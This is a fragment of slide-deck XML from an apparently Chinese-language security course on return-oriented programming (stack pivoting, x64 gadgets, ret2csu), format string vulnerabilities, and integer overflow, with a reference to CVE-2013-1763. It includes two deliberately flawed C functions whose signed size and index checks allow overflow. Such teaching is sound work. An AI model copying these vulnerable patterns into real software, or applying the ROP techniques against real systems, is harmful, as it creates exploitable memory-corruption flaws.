        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="2904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...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911" name="Shape 1911"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1912" name="Shape 1912"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1911" idx="1"/>
            <a:endCxn id="1908" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="11616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913" name="Shape 1913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="2904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gadget 1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914" name="Shape 1914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="2904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gadget N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915" name="Shape 1915"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9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new stack addr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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1916" name="Shape 1916"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="4256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917" name="Shape 1917"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164300" y="2605284"/>
            <a:ext cx="3000400" cy="5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esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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ebp = new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867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3F13A0EB-FD3D-41ED-854D-A46B1D925F42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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2" name="Shape 1922"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>: "pop ebp ret" + "leave ret"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1923" name="Shape 1923"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="4571167"/>
            <a:ext cx="2095200" cy="7636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pop ebp ret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924" name="Shape 1924"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="3000400" cy="4096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pop ebp ; ret ;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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1925" name="Shape 1925"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1923" idx="1"/>
            <a:endCxn id="1924" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6394700" y="4952967"/>
            <a:ext cx="1770000" cy="36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926" name="Shape 1926"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="1999087"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1927" name="Shape 1927"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="2203887"/>
            <a:ext cx="537600" cy="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928" name="Shape 1928"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="5816967"/>
            <a:ext cx="3000400" cy="5392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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1929" name="Shape 1929"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1928" idx="0"/>
            <a:endCxn id="1924" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4894367" y="5161367"/>
            <a:ext cx="0" cy="6556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930" name="Shape 1930"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939500" y="3200736"/>
            <a:ext cx="2095200" cy="5392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" sz="1600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mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600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931" name="Shape 1931"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393800" y="3265536"/>
            <a:ext cx="3000400" cy="4096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leave ; ret ;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932" name="Shape 1932"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3088536"/>
            <a:ext cx="2095200" cy="7636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leave ret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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1933" name="Shape 1933"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1924" idx="0"/>
            <a:endCxn id="1931" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4893967" y="3675267"/>
            <a:ext cx="400" cy="10764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934" name="Shape 1934"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1932" idx="1"/>
            <a:endCxn id="1931" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394233" y="3470336"/>
            <a:ext cx="17704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935" name="Shape 1935"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200433" y="3318336"/>
            <a:ext cx="124400" cy="290400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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936" name="Shape 1936"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="3820100"/>
            <a:ext cx="2095200" cy="7636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new stack addr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937" name="Shape 1937"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110967" y="3942033"/>
            <a:ext cx="3000400" cy="5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ebp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1938" name="Shape 1938"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1931" idx="0"/>
            <a:endCxn id="1939" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4894000" y="2316736"/>
            <a:ext cx="400" cy="9488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940" name="Shape 1940"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="2488733"/>
            <a:ext cx="2095200" cy="2904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new ebp value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939" name="Shape 1939"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="1777533"/>
            <a:ext cx="3000400" cy="5392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" sz="1867" kern="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ROP payload 2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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941" name="Shape 1941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1907933"/>
            <a:ext cx="2095200" cy="2904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...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942" name="Shape 1942"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7556000" y="1665333"/>
            <a:ext cx="539200" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1943" name="Shape 1943"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1942" idx="1"/>
            <a:endCxn id="1939" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6394400" y="2047133"/>
            <a:ext cx="11616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944" name="Shape 1944"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164700" y="2198333"/>
            <a:ext cx="2095200" cy="2904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gadget 1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945" name="Shape 1945"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164633" y="1632451"/>
            <a:ext cx="2095200" cy="2904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gadget N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946" name="Shape 1946"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10756800" y="2164725"/>
            <a:ext cx="848800" cy="9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new stack addr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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1947" name="Shape 1947"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10259833" y="2777525"/>
            <a:ext cx="4256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948" name="Shape 1948"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164300" y="2605284"/>
            <a:ext cx="3000400" cy="5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esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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ebp = new ebp value</a:t>
            </a:r>
            <a:endParaRPr sz="1867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D59593DB-F687-4C77-883A-7DC7C6261727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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7" name="Shape 1997"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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dirty="0"/>
              <a:t>x64 ROP</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1998" name="Shape 1998"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1547813"/>
            <a:ext cx="11360150" cy="4556125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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>gadget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传递参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop rsi ; pop r15 ; ret  ;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setting rdx and rcx is hard, no trivial gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret2csu</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1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78832B0-F74D-44EE-A795-5F95B7A1C824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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3" name="Shape 2003"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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dirty="0"/>
              <a:t>__libc_csu_init Gadgets for x64</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2004" name="Shape 20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0533" y="1922933"/>
            <a:ext cx="11142867" cy="4317867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2005" name="Shape 2005"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895461" y="2155945"/>
            <a:ext cx="3687200" cy="9356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006" name="Shape 2006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895461" y="4448177"/>
            <a:ext cx="3687200" cy="15600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5B043C4-0960-46F3-90DB-2D5B9A9AF058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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5D03D8DB-F1DE-4D53-AC7F-FE07611372DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="1093575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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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格式化字符串漏洞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80F7D27-A0AC-4D7E-8CEE-E2AA96811627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611582" y="2885899"/>
            <a:ext cx="773083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泄露栈内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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泄露任意地址内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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篡改栈内存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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篡改任意地址内存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2145686159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3" name="Shape 2023"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Integer Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2024" name="Shape 2024"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538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/>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>European Space Agency spacecraft Cluster I's satellites exploded because of integer overflow (1996)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M. Dowd, C. Spencer, N. Metha, N. Herath, and H. Flake. Advanced Software Vulnerability Assessment. In Blackhat USA, August 2002</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IO2BO</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array index out of bounds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025" name="Shape 2025"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="818433" y="4370667"/>
            <a:ext cx="5237200" cy="20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indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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void safe_memcpy(char *src, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="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int size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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{</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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char dst[512];</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="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size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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&lt; 512) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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memcpy(dst, src, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="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size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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}</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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600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026" name="Shape 2026"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6558200" y="4375267"/>
            <a:ext cx="4806000" cy="20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indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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void safe_set_element(char *arr, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="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int index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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char value, int arr_size) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="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index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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&lt; arr_size) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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arr[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="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index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600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] = value;</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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}</a:t>
            </a:r>
            <a:endParaRPr sz="1600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304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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600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027" name="Shape 2027"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1161733" y="4075467"/>
            <a:ext cx="15364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" sz="1867" b="1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IO2BO</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1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028" name="Shape 2028"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705200" y="4075467"/>
            <a:ext cx="23544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" sz="1867" b="1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Array index OOB</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1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3" name="Shape 2033"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="593725"/>
            <a:ext cx="11360150" cy="763588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/>
              <a:t>Integer Overflow in Linux kernel</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2034" name="Shape 2034"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539233" y="1841433"/>
            <a:ext cx="6083600" cy="41324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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1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CVE-2013-1763 Linux Kernel netlink message family number overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600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net/core/sock_diag.c View file @ 6e601a5</a:t>
